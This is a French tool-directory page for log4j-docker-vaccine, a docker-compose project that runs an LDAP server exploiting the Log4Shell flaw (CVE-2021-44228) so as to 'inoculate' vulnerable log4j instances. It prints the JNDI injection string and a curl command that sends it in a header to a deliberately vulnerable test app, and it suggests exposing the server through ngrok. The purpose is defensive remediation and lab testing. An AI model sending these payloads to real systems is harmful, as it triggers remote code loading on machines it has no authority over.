Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-docker-vaccine — Solution docker compose pour exécuter un environnement de vaccination contre la vulnérabilité log4j2 CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/jeffbryner/log4j-docker-vaccine
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

Solution docker compose pour exécuter un environnement de vaccination contre la vulnérabilité log4j2 CVE-2021-44228

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4j Docker Vaccine

Une méthode conteneurisée pour exécuter le vaccin log4j proposé par Cyberreason

  • https://github.com/Cybereason/Logout4Shell

Démarrage

Clonez ce dépôt :

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

Modifiez le fichier containers.env pour y mettre une IP/DNS privée ou publique correcte que votre cible peut atteindre. L'entrée par défaut ne fonctionnera probablement pas pour vous !

Construisez et lancez les conteneurs :

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

Vous avez maintenant un serveur ldap à l'écoute qui servira la classe Log4jRCE pour inoculer une instance log4j vulnérable.

Vous pouvez exposer ceci à Internet (si vous le souhaitez) en utilisant ngrok.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

Vous pouvez envoyer une instance log4j vulnérable à ce serveur en utilisant la célèbre chaîne d'entrée jndi :

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

Test

Il existe une version volontairement vulnérable de log4j dans un conteneur disponible sur :

  • https://github.com/christophetd/log4shell-vulnerable-app

Vous pouvez suivre leurs instructions pour le démarrer et l'utiliser pour les tests :

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Et déclencher l'inoculation via :

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
Télécharger l’outil